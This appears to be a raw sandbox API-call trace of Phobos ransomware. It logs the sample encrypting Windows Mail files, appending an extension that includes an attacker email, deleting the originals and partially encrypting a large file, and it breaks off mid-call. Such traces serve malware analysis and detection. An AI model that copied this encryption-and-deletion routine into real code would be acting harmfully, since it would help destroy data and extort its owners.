GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount")) returned 0x2020 [0190.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.864] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.864] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.865] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.865] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.865] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5e4, lpOverlapped=0x0) returned 1 [0190.882] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0) returned 1 [0190.882] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5f0, lpOverlapped=0x0) returned 1 [0190.883] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0190.883] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.883] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0190.883] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.883] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x142, lpOverlapped=0x0) returned 1 [0190.883] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.883] CloseHandle (hObject=0x14c) returned 1 [0190.883] CloseHandle (hObject=0x154) returned 1 [0190.883] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount")) returned 1 [0190.884] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.885] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1736) returned 1 [0190.885] CloseHandle (hObject=0x154) returned 1 [0190.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount")) returned 0x2020 [0190.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.885] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.885] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.472] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0191.473] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.473] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x6c8, lpOverlapped=0x0) returned 1 [0191.474] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6d0, dwBufLen=0x6d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6d0) returned 1 [0191.474] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6d0, lpOverlapped=0x0) returned 1 [0191.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0191.475] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.475] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0191.475] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.475] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x142, lpOverlapped=0x0) returned 1 [0191.475] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.475] CloseHandle (hObject=0x154) returned 1 [0191.475] CloseHandle (hObject=0xb8) returned 1 [0191.475] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount")) returned 1 [0191.476] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0191.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.476] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16384) returned 1 [0191.476] CloseHandle (hObject=0xb8) returned 1 [0191.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat")) returned 0x2020 [0191.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.477] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0191.477] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0191.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0191.477] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0191.477] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.478] ReadFile (in: hFile=0xb8, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4000, lpOverlapped=0x0) returned 1 [0191.547] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010, dwBufLen=0x4010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010) returned 1 [0191.547] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4010, lpOverlapped=0x0) returned 1 [0191.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0191.548] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.548] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0191.548] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.548] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0191.548] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.548] CloseHandle (hObject=0xb8) returned 1 [0191.549] CloseHandle (hObject=0x154) returned 1 [0191.549] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat")) returned 1 [0191.550] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0191.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0191.552] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8192) returned 1 [0191.552] CloseHandle (hObject=0x154) returned 1 [0191.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk")) returned 0x2020 [0191.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0191.552] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0191.553] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0191.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.553] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0191.553] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.553] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2000, lpOverlapped=0x0) returned 1 [0191.674] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010, dwBufLen=0x2010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010) returned 1 [0191.675] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2010, lpOverlapped=0x0) returned 1 [0191.676] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0191.676] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0191.676] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0191.676] CryptDestroyKey (hKey=0xa32de8) returned 1 [0191.676] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0191.676] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.676] CloseHandle (hObject=0x154) returned 1 [0191.676] CloseHandle (hObject=0xb8) returned 1 [0191.676] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk")) returned 1 [0191.677] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0191.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.678] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2097152) returned 1 [0191.678] CloseHandle (hObject=0xb8) returned 1 [0191.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs")) returned 0x2020 [0191.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0191.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0191.679] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0191.679] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0191.679] ReadFile (in: hFile=0xb8, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0191.736] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0191.736] ReadFile (in: hFile=0xb8, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0191.812] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0191.812] ReadFile (in: hFile=0xb8, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0192.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32a68) returned 1 [0192.149] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0192.149] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0192.155] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.155] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0192.155] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0192.179] SetEndOfFile (hFile=0xb8) returned 1 [0192.180] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.180] WriteFile (in: hFile=0xb8, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.181] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.181] WriteFile (in: hFile=0xb8, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, 